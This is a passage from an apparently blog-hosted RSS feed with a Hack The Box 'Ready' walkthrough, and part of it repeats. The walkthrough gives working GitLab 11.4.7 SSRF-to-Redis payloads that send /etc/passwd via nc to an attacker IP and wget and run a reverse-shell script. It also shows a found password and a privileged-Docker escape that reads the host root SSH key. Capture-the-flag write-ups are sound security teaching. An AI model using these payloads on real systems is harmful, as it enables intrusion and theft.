        alt/&gt;&lt;/p&gt;
&lt;p&gt;With a newly created account it is possible to check for any public projects or users to find more information in this box. However, in this instance there isn&amp;rsquo;t anything and the instance appears blank.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-gitlabhelppage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;It is possible to access a help page which, among other things, lists the current version, 11.4.7 and the notice to &amp;ldquo;Update asap&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Research on GitLab 11.4.7 there is a well know RCE through an Server Side Request Forgery, a type of vulnerability, where an an attacker can change a URL which the server will attempt to read or submit data too. In this case, it allows us to interact with an internal redis database service and start a malicious worker package.  This vulnerability was was featured in Real World CTF 2018 and LiveOverflow created a &lt;a href=&#34;https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;video and blog post&lt;/a&gt;
 detailing it.&lt;/p&gt;
&lt;p&gt;It is possible to follow along with the blog post to create a proof of concept allowing  &lt;code&gt;/etc/passwd&lt;/code&gt; to be read.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; multi
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; sadd resque:gitlab:queues system_hook_push
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; lpush resque:gitlab:queue:system_hook_push &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;{\&amp;#34;class\&amp;#34;:\&amp;#34;GitlabShellWorker\&amp;#34;,\&amp;#34;args\&amp;#34;:[\&amp;#34;class_eval\&amp;#34;,\&amp;#34;open(\&amp;#39;|cat /etc/passwd | nc 10.10.14.142 1234\&amp;#39;).read\&amp;#34;],\&amp;#34;retry\&amp;#34;:3,\&amp;#34;queue\&amp;#34;:\&amp;#34;system_hook_push\&amp;#34;,\&amp;#34;jid\&amp;#34;:\&amp;#34;ad52abc5641173e217eb2e52\&amp;#34;,\&amp;#34;created_at\&amp;#34;:1513714403.8122594,\&amp;#34;enqueued_at\&amp;#34;:1513714403.8129568}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/ssrf.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This payload is URL encoded and then &lt;code&gt;git://[0:0:0:0:0:ffff:127.0.0.1]:6379/&lt;/code&gt; is added to the front to bypass the check filter to block requests to localhost on the GitLab server. The next step is to create a new project and chose to import a git repo by URL.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-importproject.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Provide our URL encoded payload, set up a netcat listener on port 1234, and then submitting the payload, returns the contents of &lt;code&gt;/etc/password&lt;/code&gt;&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git://&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;0:0:0:0:0:ffff:127.0.0.1&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;:6379/%0A%20multi%0A%20sadd%20resque:gitlab:queues%20system_hook_push%0A%20lpush%20resque:gitlab:queue:system_hook_push%20%22%7B%5C%22class%5C%22:%5C%22GitlabShellWorker%5C%22,%5C%22args%5C%22:%5B%5C%22class_eval%5C%22,%5C%22open&lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;%5C&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;%7Ccat%20/etc/passwd%20%7C%20nc%2010.10.14.142%201234%5C&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.read%5C%22%5D,%5C%22retry%5C%22:3,%5C%22queue%5C%22:%5C%22system_hook_push%5C%22,%5C%22jid%5C%22:%5C%22ad52abc5641173e217eb2e52%5C%22,%5C%22created_at%5C%22:1513714403.8122594,%5C%22enqueued_at%5C%22:1513714403.8129568%7D%22%0A%20exec%0A%20exec%0A/ssrf.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-etcpasswdfromimport.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;foothold&#34;&gt;Foothold&lt;/h2&gt;
&lt;p&gt;Obtaining a reverse shell proved to be a bit tricky. Executing one reverse shell directly from called back but then terminated immediately. Instead, a shell can be obtained in few additional steps. Create a bash reverse shell in a script and start a python http server. Then use two SSRF requests. The first one downloads the revershell using wget. The second one executes it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Get script.sh&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; multi
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; sadd resque:gitlab:queues system_hook_push
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; lpush resque:gitlab:queue:system_hook_push &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;{\&amp;#34;class\&amp;#34;:\&amp;#34;GitlabShellWorker\&amp;#34;,\&amp;#34;args\&amp;#34;:[\&amp;#34;class_eval\&amp;#34;,\&amp;#34;open(\&amp;#39;| wget http://10.10.14.142/script.sh \&amp;#39;).read\&amp;#34;],\&amp;#34;retry\&amp;#34;:3,\&amp;#34;queue\&amp;#34;:\&amp;#34;system_hook_push\&amp;#34;,\&amp;#34;jid\&amp;#34;:\&amp;#34;ad52abc5641173e217eb2e52\&amp;#34;,\&amp;#34;created_at\&amp;#34;:1513714403.8122594,\&amp;#34;enqueued_at\&amp;#34;:1513714403.8129568}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/ssrf.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Execute script.sh&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; multi
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; sadd resque:gitlab:queues system_hook_push
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; lpush resque:gitlab:queue:system_hook_push &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;{\&amp;#34;class\&amp;#34;:\&amp;#34;GitlabShellWorker\&amp;#34;,\&amp;#34;args\&amp;#34;:[\&amp;#34;class_eval\&amp;#34;,\&amp;#34;open(\&amp;#39;| bash script.sh \&amp;#39;).read\&amp;#34;],\&amp;#34;retry\&amp;#34;:3,\&amp;#34;queue\&amp;#34;:\&amp;#34;system_hook_push\&amp;#34;,\&amp;#34;jid\&amp;#34;:\&amp;#34;ad52abc5641173e217eb2e52\&amp;#34;,\&amp;#34;created_at\&amp;#34;:1513714403.8122594,\&amp;#34;enqueued_at\&amp;#34;:1513714403.8129568}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/ssrf.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-shellhuzzah.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;user&#34;&gt;User&lt;/h2&gt;
&lt;p&gt;Very first thing to do, especially since this was a pain, is to upgrade are shell so we have more options and are less likely to crash it.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$ python3 -c &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;import pty; pty.spawn(&amp;#34;/bin/bash&amp;#34;)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;orking$ python3 -c &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;import pty; pty.spawn(&amp;#34;/bin/bash&amp;#34;)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$ ^Z
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;zsh: suspended  nc -lnvp &lt;span style=&#34;color:#ae81ff&#34;&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;┌──&lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;nightwolf㉿archlinux&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;-&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;~/HTB/Ready&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;└─$ stty -a | head -n1 | cut -d &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;;&amp;#39;&lt;/span&gt; -f 2-3 | cut -b2- | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/; /\n/&amp;#39;&lt;/span&gt;                                                                                          &lt;span style=&#34;color:#ae81ff&#34;&gt;148&lt;/span&gt; ⨯ &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; ⚙
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;rows &lt;span style=&#34;color:#ae81ff&#34;&gt;54&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;columns &lt;span style=&#34;color:#ae81ff&#34;&gt;170&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;┌──&lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;nightwolf㉿archlinux&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;-&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;~/HTB/Ready&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;└─$ stty raw -echo; fg                                                                                                                                                &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; ⚙
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;1&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;  + continued  nc -lnvp &lt;span style=&#34;color:#ae81ff&#34;&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                               stty rows &lt;span style=&#34;color:#ae81ff&#34;&gt;54&lt;/span&gt; cols &lt;span style=&#34;color:#ae81ff&#34;&gt;170&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$ export TERM&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;xterm-256color
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$ exec /bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The user can be found in &lt;code&gt;/home/dude/user.txt&lt;/code&gt; but the current user of &lt;code&gt;gitlab&lt;/code&gt; is unable to read the file itself. &lt;code&gt;gitlab&lt;/code&gt; doesn&amp;rsquo;t have any interesting groups or files that stand out in it&amp;rsquo;s  home folder. There don&amp;rsquo;t have any passwords to try with suds or su. Expanding the search, for config files that might contain credentials or other interesting info,  &lt;code&gt;.dockerenv&lt;/code&gt; is found. This  is a file in the root of the file system, letting us know that the current shell is inside a docker container.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-inthematrix.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;In the the &lt;code&gt;/opt&lt;/code&gt; directory there is a folder titled &amp;ldquo;backup&amp;rdquo; inside are various configuration files for GitLab and a docker compose file that looks to have been the same one that may have been used to start this container.&lt;/p&gt;
&lt;p&gt;Another file present in the same folder is &lt;code&gt;gitlab.rb&lt;/code&gt; a configuration file for GItLab. There is a lot of data to sift through inside it. Grep can be used to to filter out some more useful info. For example the following can be used to find references to &amp;ldquo;password &amp;ldquo;&lt;code&gt;grep -R &amp;quot;password&amp;quot; ./&lt;/code&gt;  and reveals, &lt;code&gt;wW59U!ZKMbG9+*#h&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-backupdirpassword.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;This password is not valid for &lt;code&gt;dude&lt;/code&gt; but does allow  &lt;code&gt;su&lt;/code&gt; to &lt;code&gt;root&lt;/code&gt; user inside the container. User.txt is also accessible.&lt;/p&gt;
&lt;h2 id=&#34;root&#34;&gt;Root&lt;/h2&gt;
&lt;p&gt;Docker is a platform that makes use of Linux namespaces to provide an isolated environment called a container. They can seem similar to virtual machines but are different on a technical level. If you want to read some more about that you can check out the &lt;a href=&#34;https://docs.docker.com/get-started/overview/#the-underlying-technology&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;documentation&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The docker compose file found before showed the container was likely started with the &lt;code&gt;--privileged&lt;/code&gt; flag, not something. The &lt;code&gt;--privileged&lt;/code&gt; flag launches the container with extended privileges that can be abused.&lt;/p&gt;
&lt;p&gt;From the documentation, &amp;ldquo;By default, Docker containers are “unprivileged” and cannot, for example, run a Docker daemon inside a Docker container. This is because by default a container is not allowed to access any devices, but a “privileged” container is given access to all devices (see the documentation on &lt;a href=&#34;https://www.kernel.org/doc/Documentation/cgroup-v1/devices.txt&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;cgroups devices&lt;/a&gt;
).&lt;/p&gt;
&lt;p&gt;When the operator executes &lt;code&gt;docker run --privileged&lt;/code&gt;, Docker will enable access to all devices on the host as well as set some configuration in AppArmor or SELinux to allow the container nearly all the same access to the host as processes running outside containers on the host. Additional information about running with &lt;code&gt;--privileged&lt;/code&gt; is available on the &lt;a href=&#34;http://blog.docker.com/2013/09/docker-can-now-run-within-docker/&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Docker Blog&lt;/a&gt;
.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;This is going to enable escape from the container and gain root on the host in two very simple commands. First make a directory and then simply mount sda2 in that directory.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;mkdir -p /mnt/hola
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;mount /dev/sda2 /mnt/hola
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From the the file system from of the host system is accessible the container.  &lt;code&gt;/mnt/hola/root&lt;/code&gt; contains the root flag.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-mountoutsidefilesystem.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;It is possible to obtain a root shell on the host system itself through several methods. One of which is retrive the root ssh key from, &lt;code&gt;/mnt/hola/root/.ssh/id_rsa&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-caniintrestyouinashell.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-indeedyoucan.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;wrap-up&#34;&gt;Wrap up&lt;/h2&gt;
&lt;p&gt;Huge thanks to &lt;a href=&#34;https://app.hackthebox.eu/users/27897&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;bertolis&lt;/a&gt;
 for creating this machine.  I did see several comments talking about how it was very similar to another machine that was active at the time but it still felt unique to me, especially after foothold. A docker escape was also pretty fun and I&amp;rsquo;d like to learn more advanced ways to do that in the future.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>HTB Ready</title>
      <link>http://0xnightwolf.github.io/posts/ready-writeup.md/</link>
      <pubDate>Sat, 15 May 2021 00:00:00 -0600</pubDate>
      
      <guid>http://0xnightwolf.github.io/posts/ready-writeup.md/</guid>
      <description>&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-logo.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Ready is a GitLab instance were we exploit an SSRF in order to get code execution and find ourselves in a docker container. We find some credentials to escalate to root inside the container and then leverage the fact it was started with the &amp;ldquo;privileged&amp;rdquo; flag to escape the container.&lt;/p&gt;
&lt;h2 id=&#34;enumeration&#34;&gt;Enumeration&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.91 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2021-01-27 00:15 UTC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.129.90.66
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.095s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;998&lt;/span&gt; closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT     STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu &lt;span style=&#34;color:#ae81ff&#34;&gt;4&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Ubuntu Linux; protocol 2.0&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;3072&lt;/span&gt; 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;RSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ECDSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ED25519&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;5080/tcp open  http    nginx
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| http-robots.txt: &lt;span style=&#34;color:#ae81ff&#34;&gt;53&lt;/span&gt; disallowed entries &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;15&lt;/span&gt; shown&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| / /autocomplete/users /search /api /admin /profile
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| /dashboard /projects/new /groups/new /groups/*/edit /users /help
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_/s/ /snippets/new /snippets/*/edit
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| http-title: Sign in &lt;span style=&#34;color:#ae81ff&#34;&gt;\x&lt;/span&gt;C2&lt;span style=&#34;color:#ae81ff&#34;&gt;\x&lt;/span&gt;B7 GitLab
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_Requested resource was http://10.129.90.66:5080/users/sign_in
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-trane-info: Problem with XML parsing of /evox/about
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 20.31 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;NMAP shows that port 22 is open for SSH and there is a GitLab instance running a web server on port 5080. A sign in page is accessible that allows new accounts to be created.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-gitlabsignup.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;With a newly created account it is possible to check for any public projects or users to find more information in this box. However, in this instance there isn&amp;rsquo;t anything and the instance appears blank.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-gitlabhelppage.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;It is possible to access a help page which, among other things, lists the current version, 11.4.7 and the notice to &amp;ldquo;Update asap&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Research on GitLab 11.4.7 there is a well know RCE through an Server Side Request Forgery, a type of vulnerability, where an an attacker can change a URL which the server will attempt to read or submit data too. In this case, it allows us to interact with an internal redis database service and start a malicious worker package.  This vulnerability was was featured in Real World CTF 2018 and LiveOverflow created a &lt;a href=&#34;https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;video and blog post&lt;/a&gt;
 detailing it.&lt;/p&gt;
&lt;p&gt;It is possible to follow along with the blog post to create a proof of concept allowing  &lt;code&gt;/etc/passwd&lt;/code&gt; to be read.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; multi
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; sadd resque:gitlab:queues system_hook_push
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; lpush resque:gitlab:queue:system_hook_push &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;{\&amp;#34;class\&amp;#34;:\&amp;#34;GitlabShellWorker\&amp;#34;,\&amp;#34;args\&amp;#34;:[\&amp;#34;class_eval\&amp;#34;,\&amp;#34;open(\&amp;#39;|cat /etc/passwd | nc 10.10.14.142 1234\&amp;#39;).read\&amp;#34;],\&amp;#34;retry\&amp;#34;:3,\&amp;#34;queue\&amp;#34;:\&amp;#34;system_hook_push\&amp;#34;,\&amp;#34;jid\&amp;#34;:\&amp;#34;ad52abc5641173e217eb2e52\&amp;#34;,\&amp;#34;created_at\&amp;#34;:1513714403.8122594,\&amp;#34;enqueued_at\&amp;#34;:1513714403.8129568}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/ssrf.git
